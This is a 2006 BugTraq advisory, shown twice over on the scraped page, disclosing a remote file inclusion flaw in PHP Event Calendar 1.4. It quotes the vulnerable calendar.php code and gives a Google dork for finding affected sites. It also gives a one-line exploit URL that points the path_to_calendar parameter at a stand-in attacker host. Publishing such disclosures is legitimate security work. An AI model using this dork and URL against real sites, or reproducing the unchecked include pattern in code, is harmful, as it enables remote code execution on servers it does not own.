BugTraq
Back to list
|
Post reply
PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
Jul 16 2006 03:41AM
chris_hasibuan yahoo com
#############################SolpotCrew Community################################
#
# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
#
# Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
########################################################################
#########
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
########################################################################
########
#
#
# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,
# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Anggands , Rendy , cow_1seng
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
Input passed to the "path_to_calendar" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from calendar.php
if(!$path_to_calendar){
$path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
global $db,$path_to_data,$settings;
Google dork : inurl:/cl_files/
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://ev
ilcode
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F#############################
#####
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
#
# Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
########################################################################
#########
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
########################################################################
########
#
#
# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,
# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Anggands , Rendy , cow_1seng
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
Input passed to the "path_to_calendar" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from calendar.php
if(!$path_to_calendar){
$path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
global $db,$path_to_data,$settings;
Google dork : inurl:/cl_files/
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://ev
ilcode
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F#############################
#####
[ reply ]